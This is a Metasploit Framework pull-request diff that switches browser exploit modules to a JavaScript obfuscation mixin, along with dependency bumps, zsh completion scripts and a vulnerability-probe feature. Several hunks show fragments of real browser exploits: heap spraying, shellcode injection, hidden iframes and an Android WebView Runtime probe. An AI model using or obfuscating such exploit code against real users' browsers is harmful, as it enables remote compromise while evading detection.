### PR TITLE
Update BES modules to use the JSObfu mixin

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.1.9)
+      jsobfu (~> 0.2.0)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.1.9)
+    jsobfu (0.2.0)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.1.7)
+      jsobfu (~> 0.1.9)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.1.7)
+    jsobfu (0.1.9)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.2.0)
+      jsobfu (~> 0.2.1)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.2.0)
+    jsobfu (0.2.1)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.2.1)
+      jsobfu (~> 0.2.0)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)

--- a/external/zsh/README.md
+++ b/external/zsh/README.md
@@ -1,0 +1,3 @@
+Metasploit completion definitions for zsh. The directory containing the
+completion files needs to be added to the ```$fpath``` environment variable,
+this is usually done in the ```~/.zshrc``` file.

--- a/external/zsh/_msfconsole
+++ b/external/zsh/_msfconsole
@@ -1,0 +1,39 @@
+#compdef msfconsole
+# ------------------------------------------------------------------------------
+# License
+# -------
+# This file is part of the Metasploit Framework and is released under the MSF
+# License, please see the COPYING file for more details.
+#
+# ------------------------------------------------------------------------------
+# Description
+# -----------
+#
+#  Completion script for the Metasploit Framework's msfconsole command
+#  (http://www.metasploit.com/).
+#
+# ------------------------------------------------------------------------------
+# Authors
+# -------
+#
+#  * Spencer McIntyre
+#
+# ------------------------------------------------------------------------------
+
+_arguments \
+  {-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \
+  "-c[Load the specified configuration file]:configuration file:_files" \
+  {-d,--defanged}"[Execute the console as defanged]" \
+  {-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \
+  {-h,--help}"[Show help text]" \
+  {-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \
+  {-M,--migration-path}"[Specify a directory containing additional DB migrations]:directory:_files -/" \
+  {-m,--module-path}"[Specifies an additional module search path]:search path:_files -/" \
+  {-n,--no-database}"[Disable database support]" \
+  {-o,--output}"[Output to the specified file]:output file" \
+  {-p,--plugin}"[Load a plugin on startup]:plugin file:_files" \
+  {-q,--quiet}"[Do not print the banner on start up]" \
+  {-r,--resource}"[Execute the specified resource file]:resource file:_files" \
+  {-v,--version}"[Show version]" \
+  {-x,--execute-command}"[Execute the specified string as console commands]:commands" \
+  {-y,--yaml}"[Specify a YAML file containing database settings]:yaml file:_files"

--- a/external/zsh/_msfencode
+++ b/external/zsh/_msfencode
@@ -1,0 +1,82 @@
+#compdef msfencode
+# ------------------------------------------------------------------------------
+# License
+# -------
+# This file is part of the Metasploit Framework and is released under the MSF
+# License, please see the COPYING file for more details.
+#
+# ------------------------------------------------------------------------------
+# Description
+# -----------
+#
+#  Completion script for the Metasploit Framework's msfencode command
+#  (http://www.metasploit.com/).
+#
+# ------------------------------------------------------------------------------
+# Authors
+# -------
+#
+#  * Spencer McIntyre
+#
+# ------------------------------------------------------------------------------
+
+_msfencode_encoders_list=(
+  'cmd/generic_sh'
+  'cmd/ifs'
+  'cmd/powershell_base64'
+  'cmd/printf_php_mq'
+  'generic/eicar'
+  'generic/none'
+  'mipsbe/byte_xori'
+  'mipsbe/longxor'
+  'mipsle/byte_xori'
+  'mipsle/longxor'
+  'php/base64'
+  'ppc/longxor'
+  'ppc/longxor_tag'
+  'sparc/longxor_tag'
+  'x64/xor'
+  'x86/add_sub'
+  'x86/alpha_mixed'
+  'x86/alpha_upper'
+  'x86/avoid_underscore_tolower'
+  'x86/avoid_utf8_tolower'
+  'x86/bloxor'
+  'x86/call4_dword_xor'
+  'x86/context_cpuid'
+  'x86/context_stat'
+  'x86/context_time'
+  'x86/countdown'
+  'x86/fnstenv_mov'
+  'x86/jmp_call_additive'
+  'x86/nonalpha'
+  'x86/nonupper'
+  'x86/opt_sub'
+  'x86/shikata_ga_nai'
+  'x86/single_static_bit'
+  'x86/unicode_mixed'
+  'x86/unicode_upper'
+)
+
+_msfencode_encoder() {
+  _describe -t encoders 'available encoders' _msfencode_encoders_list || compadd "$@"
+}
+
+_arguments \
+  "-a[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
+  "-b[The list of characters to avoid, example: '\x00\xff']:bad characters" \
+  "-c[The number of times to encode the data]:times" \
+  "-d[Specify the directory in which to look for EXE templates]:template file:_files -/" \
+  "-e[The encoder to use]:encoder:_msfencode_encoder" \
+  "-h[Help banner]" \
+  "-i[Encode the contents of the supplied file path]:input file:_files" \
+  "-k[Keep template working; run payload in new thread (use with -x)]" \
+  "-l[List available encoders]" \
+  "-m[Specifies an additional module search path]:module path:_files -/" \
+  "-n[Dump encoder information]" \
+  "-o[The output file]:output file" \
+  "-p[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
+  "-s[The maximum size of the encoded data]:maximum size" \
+  "-t[The output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
+  "-v[Increase verbosity]" \
+  "-x[Specify an alternate executable template]:template file:_files"

--- a/external/zsh/_msfvenom
+++ b/external/zsh/_msfvenom
@@ -1,0 +1,81 @@
+#compdef msfvenom
+# ------------------------------------------------------------------------------
+# License
+# -------
+# This file is part of the Metasploit Framework and is released under the MSF
+# License, please see the COPYING file for more details.
+#
+# ------------------------------------------------------------------------------
+# Description
+# -----------
+#
+#  Completion script for the Metasploit Framework's msfvenom command
+#  (http://www.metasploit.com/).
+#
+# ------------------------------------------------------------------------------
+# Authors
+# -------
+#
+#  * Spencer McIntyre
+#
+# ------------------------------------------------------------------------------
+
+_msfvenom_encoders_list=(
+  'cmd/generic_sh'
+  'cmd/ifs'
+  'cmd/powershell_base64'
+  'cmd/printf_php_mq'
+  'generic/eicar'
+  'generic/none'
+  'mipsbe/byte_xori'
+  'mipsbe/longxor'
+  'mipsle/byte_xori'
+  'mipsle/longxor'
+  'php/base64'
+  'ppc/longxor'
+  'ppc/longxor_tag'
+  'sparc/longxor_tag'
+  'x64/xor'
+  'x86/add_sub'
+  'x86/alpha_mixed'
+  'x86/alpha_upper'
+  'x86/avoid_underscore_tolower'
+  'x86/avoid_utf8_tolower'
+  'x86/bloxor'
+  'x86/call4_dword_xor'
+  'x86/context_cpuid'
+  'x86/context_stat'
+  'x86/context_time'
+  'x86/countdown'
+  'x86/fnstenv_mov'
+  'x86/jmp_call_additive'
+  'x86/nonalpha'
+  'x86/nonupper'
+  'x86/opt_sub'
+  'x86/shikata_ga_nai'
+  'x86/single_static_bit'
+  'x86/unicode_mixed'
+  'x86/unicode_upper'
+)
+
+_msfvenom_encoder() {
+  _describe -t encoders 'available encoders' _msfvenom_encoders_list || compadd "$@"
+}
+
+_arguments \
+  {-a,--arch}"[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
+  {-b,--bad-chars}"[The list of characters to avoid, example: '\x00\xff']:bad characters" \
+  {-c,--add-code}"[Specify an additional win32 shellcode file to include]:shellcode file:_files" \
+  {-e,--encoder}"[The encoder to use]:encoder:_msfvenom_encoder" \
+  {-f,--format}"[Output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
+  "--help-formats[List available formats]" \
+  {-h,--help}"[Help banner]" \
+  {-i,--iterations}"[The number of times to encode the payload]:iterations" \
+  {-k,--keep}"[Preserve the template behavior and inject the payload as a new thread]" \
+  {-l,--list}"[List a module type]:module type:(all encoders nops payloads)" \
+  {-n,--nopsled}"[Prepend a nopsled of length size on to the payload]:nopsled length" \
+  {-o,--options}"[List the payload's standard options]" \
+  "--platform[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
+  {-p,--payload}"[Payload to use. Specify a '-' or stdin to use custom payloads]:payload" \
+  {-s,--space}"[The maximum size of the resulting payload]:length" \
+  {-x,--template}"[Specify an alternate executable template]:template file:_files"

--- a/lib/msf/core/exploit/android.rb
+++ b/lib/msf/core/exploit/android.rb
@@ -89,8 +89,8 @@ module Exploit::Android
 
   # The NDK stager is used to launch a hidden APK
   def ndkstager(stagename, arch)
-    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
-    data = File.read(localfile, :mode => 'rb')
+    path = ['data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so']
+    data = File.read(File.join(Msf::Config::InstallRoot, *path), :mode => 'rb')
     data.gsub!('PLOAD', stagename)
   end
 

--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -3,6 +3,7 @@
 require 'erb'
 require 'cgi'
 require 'date'
+require 'set'
 require 'rex/exploitation/js'
 require 'msf/core/exploit/jsobfu'
 
@@ -23,43 +24,43 @@ module Msf
     # this must be static between runs, otherwise the older cookies will be ignored
     DEFAULT_COOKIE_NAME = '__ua'
 
-    PROXY_REQUEST_HEADER_SET = Set.new(
-      %w{
-         CLIENT_IP
-         FORWARDED
-         FORWARDED_FOR
-         FORWARDED_FOR_IP
-         HTTP_CLIENT_IP
-         HTTP_FORWARDED
-         HTTP_FORWARDED_FOR
-         HTTP_FORWARDED_FOR_IP
-         HTTP_PROXY_CONNECTION
-         HTTP_VIA
-         HTTP_X_FORWARDED
-         HTTP_X_FORWARDED_FOR
-         VIA
-         X_FORWARDED
-         X_FORWARDED_FOR
-      })
+    PROXY_REQUEST_HEADER_SET = Set.new(%w{
+       CLIENT_IP
+       FORWARDED
+       FORWARDED_FOR
+       FORWARDED_FOR_IP
+       HTTP_CLIENT_IP
+       HTTP_FORWARDED
+       HTTP_FORWARDED_FOR
+       HTTP_FORWARDED_FOR_IP
+       HTTP_PROXY_CONNECTION
+       HTTP_VIA
+       HTTP_X_FORWARDED
+       HTTP_X_FORWARDED_FOR
+       VIA
+       X_FORWARDED
+       X_FORWARDED_FOR
+    })
 
     # Requirements a browser module can define in either BrowserRequirements or in targets
-    REQUIREMENT_KEY_SET = {
-      :source       => 'source',       # Either 'script' or 'headers'
-      :ua_name      => 'ua_name',      # Example: MSIE
-      :ua_ver       => 'ua_ver',       # Example: 8.0, 9.0
-      :os_name      => 'os_name',      # Example: Microsoft Windows
-      :os_flavor    => 'os_flavor',    # Example: XP, 7
-      :language     => 'language',     # Example: en-us
-      :arch         => 'arch',         # Example: x86
-      :proxy        => 'proxy',        # 'true' or 'false'
-      :silverlight  => 'silverlight',  # 'true' or 'false'
-      :office       => 'office',       # Example: "2007", "2010"
-      :java         => 'java',         # Example: 1.6, 1.6.0.0
-      :clsid        => 'clsid',        # ActiveX clsid. Also requires the :method key
-      :method       => 'method',       # ActiveX method. Also requires the :clsid key
-      :mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
-      :flash        => 'flash'         # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
-    }
+    REQUIREMENT_KEY_SET = Set.new([
+      :source,       # Either 'script' or 'headers'
+      :ua_name,      # Example: MSIE
+      :ua_ver,       # Example: 8.0, 9.0
+      :os_name,      # Example: Microsoft Windows
+      :os_flavor,    # Example: XP, 7
+      :language,     # Example: en-us
+      :arch,         # Example: x86
+      :proxy,        # 'true' or 'false'
+      :silverlight,  # 'true' or 'false'
+      :office,       # Example: "2007", "2010"
+      :java,         # Example: 1.6, 1.6.0.0
+      :clsid,        # ActiveX clsid. Also requires the :method key
+      :method,       # ActiveX method. Also requires the :clsid key
+      :mshtml_build, # mshtml build. Example: "65535"
+      :flash,        # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
+      :vuln_test     # Example: "if(window.MyComponentIsInstalled)return true;"
+    ])
 
     def initialize(info={})
       super
@@ -129,7 +130,7 @@ module Msf
     # @return [Hash] A hash of requirements
     #
     def extract_requirements(reqs)
-      tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.has_key?(k.to_sym)}
+      tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_sym)}
       # Make sure keys are always symbols
       Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
     end
@@ -189,9 +190,12 @@ module Msf
         # Special keys to ignore because the script registers this as [:activex] = true or false
         next if k == :clsid or k == :method
 
-        vprint_debug("Comparing requirement: #{k}=#{v} vs k=#{profile[k.to_sym]}")
+        expected = k != :vuln_test ? v : 'true'
+        vprint_debug("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k.to_sym]}")
 
-        if v.is_a? Regexp
+        if k == :vuln_test
+          bad_reqs << k unless profile[k.to_sym].to_s == 'true'
+        elsif v.is_a? Regexp
           bad_reqs << k if profile[k.to_sym] !~ v
         elsif v.is_a? Proc
           bad_reqs << k unless v.call(profile[k.to_sym])
@@ -375,19 +379,20 @@ module Msf
       window.onload = function() {
         var osInfo = os_detect.getVersion();
         var d = {
-          "<%=REQUIREMENT_KEY_SET[:os_name]%>"     : osInfo.os_name,
-          "<%=REQUIREMENT_KEY_SET[:os_flavor]%>"   : osInfo.os_flavor,
-          "<%=REQUIREMENT_KEY_SET[:ua_name]%>"     : osInfo.ua_name,
-          "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"      : osInfo.ua_version,
-          "<%=REQUIREMENT_KEY_SET[:arch]%>"        : osInfo.arch,
-          "<%=REQUIREMENT_KEY_SET[:java]%>"        : misc_addons_detect.getJavaVersion(),
-          "<%=REQUIREMENT_KEY_SET[:silverlight]%>" : misc_addons_detect.hasSilverlight(),
-          "<%=REQUIREMENT_KEY_SET[:flash]%>"       : misc_addons_detect.getFlashVersion()
+          "os_name"     : osInfo.os_name,
+          "os_flavor"   : osInfo.os_flavor,
+          "ua_name"     : osInfo.ua_name,
+          "ua_ver"      : osInfo.ua_version,
+          "arch"        : osInfo.arch,
+          "java"        : misc_addons_detect.getJavaVersion(),
+          "silverlight" : misc_addons_detect.hasSilverlight(),
+          "flash"       : misc_addons_detect.getFlashVersion(),
+          "vuln_test"   : <%= js_vuln_test %>
         };
 
         <% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
-          d['<%=REQUIREMENT_KEY_SET[:office]%>'] = ie_addons_detect.getMsOfficeVersion();
-          d['<%=REQUIREMENT_KEY_SET[:mshtml_build]%>'] = ScriptEngineBuildVersion().toString();
+          d['office'] = ie_addons_detect.getMsOfficeVersion();
+          d['mshtml_build'] = ScriptEngineBuildVersion().toString();
           <%
             clsid  = @requirements[:clsid]
             method = @requirements[:method]
@@ -497,6 +502,12 @@ module Msf
             method(:on_request_exploit).call(cli, request, profile)
           else
             print_warning("Exploit requirement(s) not met: #{bad_reqs * ', '}. For more info: http://r-7.co/PVbcgx")
+            if bad_reqs.include?(:vuln_test)
+              error_string = (self.module_info['BrowserRequirements'] || {})[:vuln_test_error]
+              if error_string.present?
+                print_warning(error_string)
+              end
+            end
             send_not_found(cli)
           end
         end
@@ -553,6 +564,18 @@ module Msf
       platform = platform.gsub(/^Microsoft Windows$/, 'Windows')
 
       regenerate_payload(cli, platform, arch).encoded
+    end
+
+    # @return [String] custom Javascript to check if a vulnerability is present
+    # @return [nil] when no such test is specified by the module
+    def js_vuln_test
+      all_reqs = self.module_info['BrowserRequirements'] || {}
+      if all_reqs[:vuln_test].present?
+        code = all_reqs[:vuln_test] + ';return !!this.is_vuln;'
+        'Function(('+JSON.generate(:code => code)+').code)()'
+      else
+        'true'
+      end
     end
 
   end

--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -567,7 +567,6 @@ module Msf
     end
 
     # @return [String] custom Javascript to check if a vulnerability is present
-    # @return [nil] when no such test is specified by the module
     def js_vuln_test
       all_reqs = self.module_info['BrowserRequirements'] || {}
       if all_reqs[:vuln_test].present?

--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -111,7 +111,13 @@ module Msf::Post::Common
         o << d
       end
       o.chomp! if o
-      process.channel.close
+
+      begin
+        process.channel.close
+      rescue IOError => e
+        # Channel was already closed, but we got the cmd output, so let's soldier on.
+      end
+
       process.close
     when /shell/
       o = session.shell_command_token("#{cmd} #{args}", time_out)

--- a/lib/rex/image_source/image_source.rb
+++ b/lib/rex/image_source/image_source.rb
@@ -29,8 +29,12 @@ class ImageSource
     # FIXME, make me better
     string = ''
     loop do
-      char = read(offset, 1)
-      break if char == "\x00"
+      begin
+        char = read(offset, 1)
+      rescue RangeError
+        break
+      end
+      break if char.nil? || char == "\x00"
       offset += 1
       string << char
     end

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.1'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.9'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.2.1'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.1.9'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -12,18 +12,20 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::BrowserAutopwn
   include Msf::Exploit::Android
 
+  VULN_CHECK_JS = %Q|
+    for (i in top) {
+      try {
+        top[i].getClass().forName('java.lang.Runtime');
+        is_vuln = true; break;
+      } catch(e) {}
+    }
+  |
+
   autopwn_info(
     :os_flavor  => 'Android',
     :javascript => true,
     :rank       => ExcellentRanking,
-    :vuln_test  => %Q|
-      for (i in top) {
-        try {
-          top[i].getClass().forName('java.lang.Runtime');
-          is_vuln = true; break;
-        } catch(e) {}
-      }
-    |
+    :vuln_test  => VULN_CHECK_JS
   )
 
   def initialize(info = {})
@@ -71,7 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'       => 0,
       'BrowserRequirements' => {
         :source     => 'script',
-        :os_flavor  => 'Android'
+        :os_flavor  => 'Android',
+        :vuln_test  => VULN_CHECK_JS,
+        :vuln_test_error => 'No vulnerable Java objects were found in this web context.'
       }
     ))
 

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -93,14 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def generate_html
-    %Q|
-    <html><body>
-    #{datastore['CONTENT']}
-    <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
-    </iframe>
-    <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
-    </iframe>
-    <script>
+    js = js_obfuscate(%Q|
     (function() {
       var r = parseInt(Math.random() * 9999999);
       if (#{datastore['SIGNED_APP'].present?}) r = '';
@@ -122,6 +115,17 @@ class Metasploit3 < Msf::Exploit::Remote
         }, #{datastore['LOOP_DELAY']});
       }
     })();
+    |)
+
+    %Q|
+    <html><body>
+    #{datastore['CONTENT']}
+    <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <script>
+    #{js.to_s}
     </script>
     </body></html>
     |

--- a/modules/exploits/windows/browser/adobe_flash_avm2.rb
+++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb
@@ -79,6 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2014",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
+++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
@@ -64,6 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Dec 10 2013",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -62,6 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Apr 28 2014",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@@ -68,6 +68,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Feb 8 2013",
       'DefaultTarget'  => 0))
+
+    deregister_options('JsObfuscate')
   end
 
   def exploit

--- a/modules/exploits/windows/browser/adobe_toolbutton.rb
+++ b/modules/exploits/windows/browser/adobe_toolbutton.rb
@@ -61,6 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Aug 08 2013",
       'DefaultTarget'  => 0))
 
+
+    deregister_options('JsObfuscate')
   end
 
   def on_request_exploit(cli, request, target_info)
@@ -351,4 +353,3 @@ AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
 60197b9b ff9064030000    call    dword ptr [eax+364h] ds:0023:0c0c0c0c=????????
 
 =end
-

--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -131,14 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
     }
     |
 
-    js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
-
-    return js
+    js_obfuscate(heaplib(js, {:noobfu => true})).to_s
   end
 
   def exploit_template(cli, target_info)

--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -176,9 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js_p1 = Rex::Text.to_unescape(p1)
     js_p2 = Rex::Text.to_unescape(p2)
 
-    %Q|
-<html>
-<script>
+    js = js_obfuscate(%Q|
 #{js_property_spray}
 
 function loadOffice() {
@@ -233,6 +231,12 @@ window.onload = function() {
   loadOffice();
   hit();
 }
+    |)
+
+    %Q|
+<html>
+<script>
+#{js.to_s}
 </script>
 </html>
     |

--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -80,6 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Mar 12 2013",
       'DefaultTarget'  => 0))
 
+    deregister_options('JsObfuscate')
+
   end
 
   def setup
@@ -151,4 +153,3 @@ EOF
   end
 
 end
-

--- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
+++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
@@ -126,16 +126,11 @@ class Metasploit3 < Msf::Exploit::Remote
     js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj)
     js_payload  = ::Rex::Text.to_unescape(get_payload)
 
-    template = %Q|
-    <html>
-    <meta http-equiv="X-UA-Compatible" content="IE=7"/>
-    <meta http-equiv="refresh" content="2"/>
-    <head>
-    <script language='javascript'>
-    <%=js_property_spray%>
+    js = js_obfuscate(%Q|
+    #{js_property_spray}
 
-    var fake_obj = unescape("<%=js_fake_obj%>");
-    var s = unescape("<%=js_payload%>");
+    var fake_obj = unescape("#{js_fake_obj}");
+    var s = unescape("#{js_payload}");
 
     sprayHeap({shellcode:s});
 
@@ -149,11 +144,20 @@ class Metasploit3 < Msf::Exploit::Remote
       document.execCommand('SelectAll');
       document.execCommand('InsertButton');
       sprayHeap({shellcode:fake_obj, heapBlockSize:0x10});
-      document.body.innerHTML = '<%=Rex::Text.rand_text_alpha(1)%>';
+      document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}';
     }
+    |)
+
+    template = %Q|
+    <html>
+    <meta http-equiv="X-UA-Compatible" content="IE=7"/>
+    <meta http-equiv="refresh" content="2"/>
+    <head>
+    <script language='javascript'>
+    #{js.to_s}
     </script>
     </head>
-    <body onload="setupPage()" onmove="hitMe()" />
+    <body onload="#{js.sym('setupPage')}()" onmove="#{js.sym('hitMe')}()" />
     </html>
     |
 

--- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -84,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Nov 08 2013",
       'DefaultTarget'  => 0))
 
+    deregister_options('JsObfuscate')
   end
 
   def exploit_template(cli, target_info)

--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -64,6 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Feb 13 2014",
       'DefaultTarget'  => 0))
 
+    deregister_options('JsObfuscate')
   end
 
   def stack_adjust

--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -88,14 +88,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_html
-    template = %Q|<!DOCTYPE html>
-<html>
-  <head>
-    <meta http-equiv='Cache-Control' content='no-cache'/>
-    <meta http-equiv="X-UA-Compatible" content="IE=edge" >
-    <script>
-      <%=js_property_spray%>
-      sprayHeap({shellcode:unescape("<%=get_payload%>")});
+    js = js_obfuscate(%Q|
+      #{js_property_spray}
+      sprayHeap({shellcode:unescape("#{get_payload}")});
 
       function hxds() {
         try {
@@ -108,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
         var fake = "";
         for (var i = 0; i < 12; i++) {
           if (i==0) {
-             fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
+             fake += unescape("#{Rex::Text.to_unescape([target['Pivot']].pack('V*'))}");
           }
           else {
             fake += "\\u4141\\u4141";
@@ -139,9 +134,18 @@ class Metasploit3 < Msf::Exploit::Remote
         var fillObject = document.createElement('button');
         fillObject.className = fake;
       }
